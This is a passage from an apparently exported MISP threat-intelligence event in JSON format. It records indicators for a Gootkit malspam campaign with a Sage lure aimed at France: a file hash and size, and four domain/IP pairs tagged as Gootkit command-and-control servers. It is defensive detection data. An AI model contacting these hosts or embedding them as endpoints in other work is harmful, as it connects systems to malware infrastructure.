 920 |                         "disable_correlation": false,
 921 |                         "object_id": "794",
 922 |                         "object_relation": "sha1",
 923 |                         "value": "1612ae9b9015b964c719e9e9ac250820508c085b",
 924 |                         "ShadowAttribute": []
 925 |                     },
 926 |                     {
 927 |                         "id": "71491",
 928 |                         "type": "size-in-bytes",
 929 |                         "category": "Other",
 930 |                         "to_ids": false,
 931 |                         "uuid": "5b3553dd-81bc-4b77-a0d0-0560c0a8a8de",
 932 |                         "event_id": "2879",
 933 |                         "distribution": "5",
 934 |                         "timestamp": "1530221533",
 935 |                         "comment": "",
 936 |                         "sharing_group_id": "0",
 937 |                         "deleted": false,
 938 |                         "disable_correlation": true,
 939 |                         "object_id": "794",
 940 |                         "object_relation": "size-in-bytes",
 941 |                         "value": "260608",
 942 |                         "ShadowAttribute": []
 943 |                     }
 944 |                 ]
 945 |             },
 946 |             {
 947 |                 "id": "795",
 948 |                 "name": "domain|ip",
 949 |                 "meta-category": "network",
 950 |                 "description": "A domain and IP address seen as a tuple in a specific time frame.",
 951 |                 "template_uuid": "43b3b146-77eb-4931-b4cc-b66c60f28734",
 952 |                 "template_version": "2",
 953 |                 "event_id": "2879",
 954 |                 "uuid": "5b35564d-674c-45ae-bad2-3bbfc0a8a8de",
 955 |                 "timestamp": "1530222157",
 956 |                 "distribution": "5",
 957 |                 "sharing_group_id": "0",
 958 |                 "comment": "Gootkit C2",
 959 |                 "deleted": false,
 960 |                 "ObjectReference": [],
 961 |                 "Attribute": [
 962 |                     {
 963 |                         "id": "71493",
 964 |                         "type": "text",
 965 |                         "category": "Other",
 966 |                         "to_ids": false,
 967 |                         "uuid": "5b35564d-a004-4438-8757-3bbfc0a8a8de",
 968 |                         "event_id": "2879",
 969 |                         "distribution": "5",
 970 |                         "timestamp": "1530222157",
 971 |                         "comment": "",
 972 |                         "sharing_group_id": "0",
 973 |                         "deleted": false,
 974 |                         "disable_correlation": true,
 975 |                         "object_id": "795",
 976 |                         "object_relation": "text",
 977 |                         "value": "Gootkit C2",
 978 |                         "ShadowAttribute": []
 979 |                     },
 980 |                     {
 981 |                         "id": "71494",
 982 |                         "type": "domain",
 983 |                         "category": "Network activity",
 984 |                         "to_ids": true,
 985 |                         "uuid": "5b35564d-b2d8-4c8c-aa89-3bbfc0a8a8de",
 986 |                         "event_id": "2879",
 987 |                         "distribution": "5",
 988 |                         "timestamp": "1530222157",
 989 |                         "comment": "",
 990 |                         "sharing_group_id": "0",
 991 |                         "deleted": false,
 992 |                         "disable_correlation": false,
 993 |                         "object_id": "795",
 994 |                         "object_relation": "domain",
 995 |                         "value": "un1.pureperformanceparts.com",
 996 |                         "ShadowAttribute": []
 997 |                     },
 998 |                     {
 999 |                         "id": "71495",
1000 |                         "type": "ip-dst",
1001 |                         "category": "Network activity",
1002 |                         "to_ids": true,
1003 |                         "uuid": "5b35564d-a644-4652-9b74-3bbfc0a8a8de",
1004 |                         "event_id": "2879",
1005 |                         "distribution": "5",
1006 |                         "timestamp": "1530222157",
1007 |                         "comment": "",
1008 |                         "sharing_group_id": "0",
1009 |                         "deleted": false,
1010 |                         "disable_correlation": false,
1011 |                         "object_id": "795",
1012 |                         "object_relation": "ip",
1013 |                         "value": "178.159.4.52",
1014 |                         "ShadowAttribute": []
1015 |                     }
1016 |                 ]
1017 |             },
1018 |             {
1019 |                 "id": "796",
1020 |                 "name": "domain|ip",
1021 |                 "meta-category": "network",
1022 |                 "description": "A domain and IP address seen as a tuple in a specific time frame.",
1023 |                 "template_uuid": "43b3b146-77eb-4931-b4cc-b66c60f28734",
1024 |                 "template_version": "2",
1025 |                 "event_id": "2879",
1026 |                 "uuid": "5b355659-a760-4108-a8fa-055dc0a8a8de",
1027 |                 "timestamp": "1530222169",
1028 |                 "distribution": "5",
1029 |                 "sharing_group_id": "0",
1030 |                 "comment": "Gootkit C2",
1031 |                 "deleted": false,
1032 |                 "ObjectReference": [],
1033 |                 "Attribute": [
1034 |                     {
1035 |                         "id": "71496",
1036 |                         "type": "text",
1037 |                         "category": "Other",
1038 |                         "to_ids": false,
1039 |                         "uuid": "5b355659-6cdc-41a7-baa4-055dc0a8a8de",
1040 |                         "event_id": "2879",
1041 |                         "distribution": "5",
1042 |                         "timestamp": "1530222169",
1043 |                         "comment": "",
1044 |                         "sharing_group_id": "0",
1045 |                         "deleted": false,
1046 |                         "disable_correlation": true,
1047 |                         "object_id": "796",
1048 |                         "object_relation": "text",
1049 |                         "value": "Gootkit C2",
1050 |                         "ShadowAttribute": []
1051 |                     },
1052 |                     {
1053 |                         "id": "71497",
1054 |                         "type": "domain",
1055 |                         "category": "Network activity",
1056 |                         "to_ids": true,
1057 |                         "uuid": "5b355659-4c90-4d89-97b9-055dc0a8a8de",
1058 |                         "event_id": "2879",
1059 |                         "distribution": "5",
1060 |                         "timestamp": "1530222169",
1061 |                         "comment": "",
1062 |                         "sharing_group_id": "0",
1063 |                         "deleted": false,
1064 |                         "disable_correlation": false,
1065 |                         "object_id": "796",
1066 |                         "object_relation": "domain",
1067 |                         "value": "1nu.pureperformanceparts.uk",
1068 |                         "ShadowAttribute": []
1069 |                     },
1070 |                     {
1071 |                         "id": "71498",
1072 |                         "type": "ip-dst",
1073 |                         "category": "Network activity",
1074 |                         "to_ids": true,
1075 |                         "uuid": "5b355659-e8b0-40ad-806d-055dc0a8a8de",
1076 |                         "event_id": "2879",
1077 |                         "distribution": "5",
1078 |                         "timestamp": "1530222169",
1079 |                         "comment": "",
1080 |                         "sharing_group_id": "0",
1081 |                         "deleted": false,
1082 |                         "disable_correlation": false,
1083 |                         "object_id": "796",
1084 |                         "object_relation": "ip",
1085 |                         "value": "178.159.4.52",
1086 |                         "ShadowAttribute": []
1087 |                     }
1088 |                 ]
1089 |             },
1090 |             {
1091 |                 "id": "797",
1092 |                 "name": "domain|ip",
1093 |                 "meta-category": "network",
1094 |                 "description": "A domain and IP address seen as a tuple in a specific time frame.",
1095 |                 "template_uuid": "43b3b146-77eb-4931-b4cc-b66c60f28734",
1096 |                 "template_version": "2",
1097 |                 "event_id": "2879",
1098 |                 "uuid": "5b35567b-4d9c-4bad-9a32-055dc0a8a8de",
1099 |                 "timestamp": "1530222203",
1100 |                 "distribution": "5",
1101 |                 "sharing_group_id": "0",
1102 |                 "comment": "Gootkit C2",
1103 |                 "deleted": false,
1104 |                 "ObjectReference": [],
1105 |                 "Attribute": [
1106 |                     {
1107 |                         "id": "71499",
1108 |                         "type": "text",
1109 |                         "category": "Other",
1110 |                         "to_ids": false,
1111 |                         "uuid": "5b35567b-b484-453a-b458-055dc0a8a8de",
1112 |                         "event_id": "2879",
1113 |                         "distribution": "5",
1114 |                         "timestamp": "1530222203",
1115 |                         "comment": "",
1116 |                         "sharing_group_id": "0",
1117 |                         "deleted": false,
1118 |                         "disable_correlation": true,
1119 |                         "object_id": "797",
1120 |                         "object_relation": "text",
1121 |                         "value": "Gootkit C2",
1122 |                         "ShadowAttribute": []
1123 |                     },
1124 |                     {
1125 |                         "id": "71500",
1126 |                         "type": "domain",
1127 |                         "category": "Network activity",
1128 |                         "to_ids": true,
1129 |                         "uuid": "5b35567b-9f34-4826-aca1-055dc0a8a8de",
1130 |                         "event_id": "2879",
1131 |                         "distribution": "5",
1132 |                         "timestamp": "1530222203",
1133 |                         "comment": "",
1134 |                         "sharing_group_id": "0",
1135 |                         "deleted": false,
1136 |                         "disable_correlation": false,
1137 |                         "object_id": "797",
1138 |                         "object_relation": "domain",
1139 |                         "value": "crucialtrk.com",
1140 |                         "ShadowAttribute": []
1141 |                     },
1142 |                     {
1143 |                         "id": "71501",
1144 |                         "type": "ip-dst",
1145 |                         "category": "Network activity",
1146 |                         "to_ids": true,
1147 |                         "uuid": "5b35567b-1f3c-4f5a-8331-055dc0a8a8de",
1148 |                         "event_id": "2879",
1149 |                         "distribution": "5",
1150 |                         "timestamp": "1530222203",
1151 |                         "comment": "",
1152 |                         "sharing_group_id": "0",
1153 |                         "deleted": false,
1154 |                         "disable_correlation": false,
1155 |                         "object_id": "797",
1156 |                         "object_relation": "ip",
1157 |                         "value": "80.211.227.140",
1158 |                         "ShadowAttribute": []
1159 |                     }
1160 |                 ]
1161 |             },
1162 |             {
1163 |                 "id": "798",
1164 |                 "name": "domain|ip",
1165 |                 "meta-category": "network",
1166 |                 "description": "A domain and IP address seen as a tuple in a specific time frame.",
1167 |                 "template_uuid": "43b3b146-77eb-4931-b4cc-b66c60f28734",
1168 |                 "template_version": "2",
1169 |                 "event_id": "2879",
1170 |                 "uuid": "5b355693-c530-43a4-aa16-0640c0a8a8de",
1171 |                 "timestamp": "1530222227",
1172 |                 "distribution": "5",
1173 |                 "sharing_group_id": "0",
1174 |                 "comment": "Gootkit C2",
1175 |                 "deleted": false,
1176 |                 "ObjectReference": [],
1177 |                 "Attribute": [
1178 |                     {
1179 |                         "id": "71502",
1180 |                         "type": "text",
1181 |                         "category": "Other",
1182 |                         "to_ids": false,
1183 |                         "uuid": "5b355693-ddd8-4418-9d16-0640c0a8a8de",
1184 |                         "event_id": "2879",
1185 |                         "distribution": "5",
1186 |                         "timestamp": "1530222227",
1187 |                         "comment": "",
1188 |                         "sharing_group_id": "0",
1189 |                         "deleted": false,
1190 |                         "disable_correlation": true,
1191 |                         "object_id": "798",
1192 |                         "object_relation": "text",
1193 |                         "value": "Gootkit C2",
1194 |                         "ShadowAttribute": []
1195 |                     },
1196 |                     {
1197 |                         "id": "71503",
1198 |                         "type": "domain",
1199 |                         "category": "Network activity",
1200 |                         "to_ids": true,
1201 |                         "uuid": "5b355693-d4c4-4de0-8c11-0640c0a8a8de",
1202 |                         "event_id": "2879",
1203 |                         "distribution": "5",
1204 |                         "timestamp": "1530222227",
1205 |                         "comment": "",
1206 |                         "sharing_group_id": "0",
1207 |                         "deleted": false,
1208 |                         "disable_correlation": false,
1209 |                         "object_id": "798",
1210 |                         "object_relation": "domain",
1211 |                         "value": "atlantic-electrics.com",
1212 |                         "ShadowAttribute": []
1213 |                     },
1214 |                     {
1215 |                         "id": "71504",
1216 |                         "type": "ip-dst",
1217 |                         "category": "Network activity",
1218 |                         "to_ids": true,
1219 |                         "uuid": "5b355694-14e4-4066-99d8-0640c0a8a8de",
1220 |                         "event_id": "2879",
1221 |                         "distribution": "5",
1222 |                         "timestamp": "1530222227",
1223 |                         "comment": "",
1224 |                         "sharing_group_id": "0",
1225 |                         "deleted": false,
1226 |                         "disable_correlation": false,
1227 |                         "object_id": "798",
1228 |                         "object_relation": "ip",
1229 |                         "value": "45.76.134.125",
1230 |                         "ShadowAttribute": []
1231 |                     }
1232 |                 ]
1233 |             }
1234 |         ],
1235 |         "Tag": [
1236 |             {
1237 |                 "id": "205",
1238 |                 "name": "dnc:driveby-type=\"Malspam\"",
1239 |                 "colour": "#000000",
1240 |                 "exportable": true,
1241 |                 "hide_tag": false
1242 |             },
1243 |             {
1244 |                 "id": "477",
1245 |                 "name": "dnc:malspam-type=\"url-to-zipped-js\"",
1246 |                 "colour": "#390658",
1247 |                 "exportable": true,
1248 |                 "hide_tag": false
1249 |             },
1250 |             {
1251 |                 "id": "1792",
1252 |                 "name": "dnc:lure-theme=\"Sage\"",
1253 |                 "colour": "#00dc06",
1254 |                 "exportable": true,
1255 |                 "hide_tag": false
1256 |             },
1257 |             {
1258 |                 "id": "465",
1259 |                 "name": "dnc:attrib=\"Undefined\"",
1260 |                 "colour": "#686868",
1261 |                 "exportable": true,
1262 |                 "hide_tag": false
1263 |             },
1264 |             {
1265 |                 "id": "107",
1266 |                 "name": "dnc:country=\"FRA\"",
1267 |                 "colour": "#0000f8",
1268 |                 "exportable": true,
1269 |                 "hide_tag": false
1270 |             },
1271 |             {
1272 |                 "id": "73",
1273 |                 "name": "dnc:malware=\"Gootkit\"",
1274 |                 "colour": "#f0f0f0",
1275 |                 "exportable": true,
1276 |                 "hide_tag": false
1277 |             },
1278 |             {
1279 |                 "id": "1781",
1280 |                 "name": "dnc:gootkit-vendor_id=\"1001\"",
1281 |                 "colour": "#f0f0f0",
1282 |                 "exportable": true,
1283 |                 "hide_tag": false
1284 |             }
1285 |         ]
1286 |     }
1287 | }
1288 | ]}
1289 | 


--------------------------------------------------------------------------------